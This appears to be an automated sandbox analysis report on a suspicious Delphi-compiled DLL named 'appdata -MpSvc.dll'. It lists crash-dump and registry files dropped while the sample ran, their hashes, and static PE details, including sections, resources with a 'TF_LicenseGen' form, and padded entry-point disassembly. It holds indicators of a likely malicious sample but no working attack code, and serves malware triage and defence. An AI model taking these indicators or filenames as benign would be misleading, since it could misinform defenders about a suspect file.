Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="226674" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6881.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Mar 8 18:51:53 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	44688
Entropy (8bit):	2.022935002067335
Encrypted:	false
SSDEEP:	192:F64p1n+XqyAUO5H436SMXQCzImScLpk2ob:fp19b5Hg69XQuJScL4
MD5:	4AFCA2AACD57B809C9EC6E3B76734330
SHA1:	B6360802F369384E7A5134A738559A9E37A2F749
SHA-256:	F5DEC393DCBD8D41AC9E23E7F8B5CA5A9AEBCBD426F34628DC0A87FF9861FE53
SHA-512:	958091D05DA5A293B6AEC122D2492FCD135444CC1985BD2BAEE8833BE8A19EF35D405505F7A1174A6B37540874926FE24EFB2597AFDA0F52EF31CF313EC5793E
Malicious:	false
Preview:	MDMP..a..... .......I^.e........................(...............8,..........T.......8...........T...........@...P.......................................................................................................eJ......H.......GenuineIntel............T.......t...H^.e.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6890.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Mar 8 18:51:53 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	44488
Entropy (8bit):	1.9696186046168105
Encrypted:	false
SSDEEP:	192:F6kB+XcWvGO5H44x+TzWTBJFy6JADWbCOeU:d/i5H0WT1y6JdHT
MD5:	10C3BCFC7FC982E7BFE26E3A4BB6878E
SHA1:	81530E8FBA6357BFB1169580BD72A8E481ED5564
SHA-256:	A811818E78F1A12D56C39E4D29F45C59719F887978BBC50A20F67652FBE439C1
SHA-512:	0C7CDDE8F5FF8AAFB087DCCFF5FFAFEE326059724576643BDBE4681DB61C7AF5FAC71FF42B926822ADC7DEB703109D9F4683F6EC0511C8767CECA84DA51944D7
Malicious:	false
Preview:	MDMP..a..... .......I^.e........................(...............8,..........T.......8...........T...........@...........................................................................................................eJ......H.......GenuineIntel............T...........H^.e.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER697C.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8300
Entropy (8bit):	3.6946553882280333
Encrypted:	false
SSDEEP:	192:R6l7wVeJja666Y0DJ65wgmfTMDprw89bOosfqvUam:R6lXJ+666YuJ6egmfTMTObfqvo
MD5:	563969A99C863316CC9868020C89EBC8
SHA1:	225DD403294F99DB5B374A766CFEAD0C3C626B7B
SHA-256:	A9FC87AC99BC07EC9CCC5B1654AE6D5B46A973A886B28B1994128C05DC245DEC
SHA-512:	E690569251E5BDB8611019323461D09EAAD969927060E6B0D9306F5E3318FB6116DE136661FDAB8640AFD9E81324D19E50BE04318725BC62A9B3BD9036F7D38B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER698B.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8364
Entropy (8bit):	3.6930693322569046
Encrypted:	false
SSDEEP:	192:R6l7wVeJk6686Y0Du65wgmf8AoDprw89bOxsfCiVam:R6lXJh686Yuu6egmf8AoTOqfCC
MD5:	1F4F7EA83A2DE8AAF14D976060D2AA71
SHA1:	AEC11A9E231F538A886D4684574A1835C7CBD363
SHA-256:	2DFB32ECDFE5F28B1EEC4AD0EE8A6350F0B9F7B8CEFDD9111D0606278CE9D88C
SHA-512:	D145A6602DA0B0389B599DC449931C960D165B822A9526D60F26C262E8BB529A56E3AB13D872B3486114376CFE39D8BFA512CF405C9C70908D5421B072B8E450
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.5.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER69BB.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4658
Entropy (8bit):	4.464432536486927
Encrypted:	false
SSDEEP:	48:cvIwWl8zsFJg77aI9OkcWpW8VYvYm8M4JCdPvHFfa+q8/ZT8UGScS5d:uIjffI7ZV7VLJj/UJ35d
MD5:	C19630A240AF78EB46C9F6E9E538006A
SHA1:	ECAE12C9FD2369B3C3C327C5F3CF153CD977A48B
SHA-256:	5A2213DA76D1532F41C8653A8BEB86740ADACDC57B1DD6067374351BC3DD4C39
SHA-512:	4C4C46917A01F2D32440E122AEF305CC722BE53C071E8D6628F1ED2DC8979331C1A1E1D135D3C600C113872718243AD2B2E4006921F7100B8A02E3830B3DB9DF
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="226674" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER71A9.tmp.dmp

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Mar 8 18:51:55 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	121986
Entropy (8bit):	1.9828881037080905
Encrypted:	false
SSDEEP:	384:+9od9QKeTDZN5HzP90J8zzLiHafGTfeCO7wLH/kDabcFsb4Dg:bgpZN5zP9t3WyGTfeCxH8bsyg
MD5:	C361D15A47A8170B0166177480475A88
SHA1:	0B6910D596C406AB301A017DBF4EF413BEF8029A
SHA-256:	CE5733950EB2B08CBB15A1EA963D1759BE6CBFDC987550BAB08B986E7A97ADFB
SHA-512:	C2E16C14C8A0423A49C1E460AFDACDC87065A46346B6B4C28D0A706B01A81ECC8179557FC5A552EDD659C1D57F58A5FA04853A3C4868767FCA616D50535C25EA
Malicious:	false
Preview:	MDMP..a..... .......K^.e......................... ..........D...~S..........T.......8...........T............S..............l)..........X+..............................................................................eJ.......+......GenuineIntel............T.......d...H^.e.............................0..1...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER739E.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8320
Entropy (8bit):	3.6959831051334984
Encrypted:	false
SSDEEP:	192:R6l7wVeJB/656Y0Q65wgmfT64cDprH89b4Esfy2om:R6lXJZ656Y76egmfT64cm43fyw
MD5:	706C1D93F02667147785979242051B19
SHA1:	75B2F44E5DAE8653F7C659139CA01B1A69E56EBC
SHA-256:	D7A7D44C20F294520E7C70623F583DBCDBBFD00FB60C7CEA020A57C75B630355
SHA-512:	E1DC563FABEDA16FB067F93EC6586EEE2A48A64D5ABD0D3BE6A95A3AA1BF73E26D2FD6479BD4A7870221FB13DC54F56BD4FEC57FBB4F061F8D1D7A9C3660B014
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.2.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER73CD.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4666
Entropy (8bit):	4.4823829558571955
Encrypted:	false
SSDEEP:	48:cvIwWl8zsFJg77aI9OkcWpW8VYwYm8M4JCdPJFL+q8/uXXUGScS/d:uIjffI7ZV7VYJw1XUJ3/d
MD5:	FD7E86A7B5145B3141D599C922A25AF6
SHA1:	021F9F5A72B0838E2AA1BC31BB16866086F29B25
SHA-256:	A3E9EF3AE2CE056CF92C05E5D8F92998D237E9E0F9DC9EDFE23EC078C9B84F64
SHA-512:	FEF9C8D41C14E8A6D7F9DE70457AC67397D25F7A20BEE54DCBDD3F4A7114D713CE05528F8A5FA04859BEC6F05C2456F7867EE12B7C80595EE815155AB87B179C
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="226674" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.42227083211249
Encrypted:	false
SSDEEP:	6144:vSvfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnNP0uhiTw:6vloTyW+EZMM6DFyl03w
MD5:	9C80C530F6C438E7E25884223EDF3AF0
SHA1:	7E0040E59A0BAC6909D105BFEC9B3A7DEBF7D9D8
SHA-256:	56AA9290C87C314D5C974C1B58988ED00EE5AFDF547829031DC3BADD7A6DCFD8
SHA-512:	9A9F064517D3220ACB076112BF53A5F1DA3B275B13EF472995CEF3A50199E853FD58DC07F49D7F8FA840A596D929E6CFFDBFFED6A2C1834A182BBBAFCBEADC75
Malicious:	false
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.c...q..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	1.0541805421345023
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 95.46% Win32 EXE PECompact compressed (generic) (41571/9) 3.96% Win16/32 Executable Delphi generic (2074/23) 0.20% Generic Win/DOS Executable (2004/3) 0.19% DOS Executable Generic (2002/1) 0.19%
File name:	appdata -MpSvc.dll
File size:	26'239'902 bytes
MD5:	504356291f6139c3400cdd7842bc1406
SHA1:	eaae969b5db3779fbb9a1bba694468b003822c77
SHA256:	34a5017f3894d9d403fd2c5baa03d7bb6b9c28afb74e36010310af8f601602fb
SHA512:	260fa1552a7222b90707035c93899a281c996d0316f75946195c40710e60992f3555ad01fec03c45eb81710064d8947939a5e1c6e5f3cd617aa1374ba645bb19
SSDEEP:	24576:cMVKcnCjOGVNZXkLkswbSZ+UJ2L4yE9Ivvo5nlgzNNqFBsS4ETlX/sTTz7GMLIrN:7Y2UnaJGEF6S40sTbGM0oTAiEwdwb
TLSH:	9D476D23B684763AC07F1A395427A654993FB76235969DAF57F00C4CCF365802A3FA0B
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x650898
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, DLL, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x65D69275 [Thu Feb 22 00:16:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	4c1f56b4c50db99105e4a3eba0452881

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFC0h
mov eax, 00647210h
call 00007FFAE0906595h
call 00007FFAE08FF61Ch
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x266000	0xd2	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x261000	0x3f00	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x29e000	0xc800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x268000	0x352e0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x261bb4	0x9ac	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x265000	0xac6	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x24d310	0x24d400	88c3eda7ab2c914c2a9c5a5264606dab	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x24f000	0x18b0	0x1a00	a0dbfab2a75d6871c6c2fd045fb0b7e2	False	0.5171274038461539	data	6.1638649467993485	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x251000	0x8eac	0x9000	6bc1cd1916205358cb83ad1716ba5a53	False	0.5597059461805556	data	6.102741094473156	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x25a000	0x6d4c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x261000	0x3f00	0x4000	0b256511ccbf3690e4608b76222cb9d6	False	0.30609130859375	data	5.133668405694886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0x265000	0xac6	0xc00	5d7ace3d0cc4aba26eb6a03d4ed33b64	False	0.3277994791666667	data	3.924768163545641	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x266000	0xd2	0x200	7baa57fb3a575a2793f3eca6fe25464f	False	0.353515625	data	2.5812448053415076	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rdata	0x267000	0x44	0x200	c9f8bfa36b2dc5163b75d3196d251b45	False	0.15625	data	1.1660636886017055	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x268000	0x352e0	0x35400	6f0174c94dbdb677a8c35c4bea9ef968	False	0.561656396713615	data	6.7153508191439295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x29e000	0xc800	0xc800	042c0351f4331fdf7d6d9f7df2537c05	False	0.2859765625	data	4.749895191517642	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x29ed74	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x29eea8	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x29efdc	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x29f110	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x29f244	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x29f378	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x29f4ac	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x29f5e0	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x29f7b0	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x29f994	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x29fb64	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x29fd34	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x29ff04	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x2a00d4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x2a02a4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x2a0474	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x2a0644	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x2a0814	0x98	Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors	English	United States	0.5197368421052632
RT_BITMAP	0x2a08ac	0x98	Device independent bitmap graphic, 9 x 6 x 4, image size 48, 16 important colors	English	United States	0.506578947368421
RT_STRING	0x2a0944	0xb08	data			0.2730169971671388
RT_STRING	0x2a144c	0x898	data			0.28863636363636364
RT_STRING	0x2a1ce4	0x368	data			0.32798165137614677
RT_STRING	0x2a204c	0x434	data			0.40427509293680297
RT_STRING	0x2a2480	0x1b0	data			0.5532407407407407
RT_STRING	0x2a2630	0xcc	data			0.6666666666666666
RT_STRING	0x2a26fc	0x28c	data			0.4294478527607362
RT_STRING	0x2a2988	0x160	data			0.5454545454545454
RT_STRING	0x2a2ae8	0x350	data			0.42806603773584906
RT_STRING	0x2a2e38	0x414	data			0.3611111111111111
RT_STRING	0x2a324c	0x358	data			0.3820093457943925
RT_STRING	0x2a35a4	0x4f8	data			0.3026729559748428
RT_STRING	0x2a3a9c	0x2c4	data			0.3375706214689266
RT_STRING	0x2a3d60	0x3c0	data			0.428125
RT_STRING	0x2a4120	0x434	data			0.3745353159851301
RT_STRING	0x2a4554	0x4cc	data			0.3713355048859935
RT_STRING	0x2a4a20	0x454	data			0.3303249097472924
RT_STRING	0x2a4e74	0x38c	data			0.3535242290748899
RT_STRING	0x2a5200	0x450	data			0.3858695652173913
RT_STRING	0x2a5650	0x200	data			0.412109375
RT_STRING	0x2a5850	0xc4	data			0.6428571428571429
RT_STRING	0x2a5914	0x170	data			0.5597826086956522
RT_STRING	0x2a5a84	0x334	data			0.41585365853658535
RT_STRING	0x2a5db8	0x408	data			0.3168604651162791
RT_STRING	0x2a61c0	0x38c	data			0.3876651982378855
RT_STRING	0x2a654c	0x2b4	data			0.4263005780346821
RT_RCDATA	0x2a6800	0x10	data			1.5
RT_RCDATA	0x2a6810	0x74c	data			0.5321199143468951
RT_RCDATA	0x2a6f5c	0x2	data	English	United States	5.0
RT_RCDATA	0x2a6f60	0x122a	Delphi compiled form 'TF_LicenseGen'			0.37827956989247313
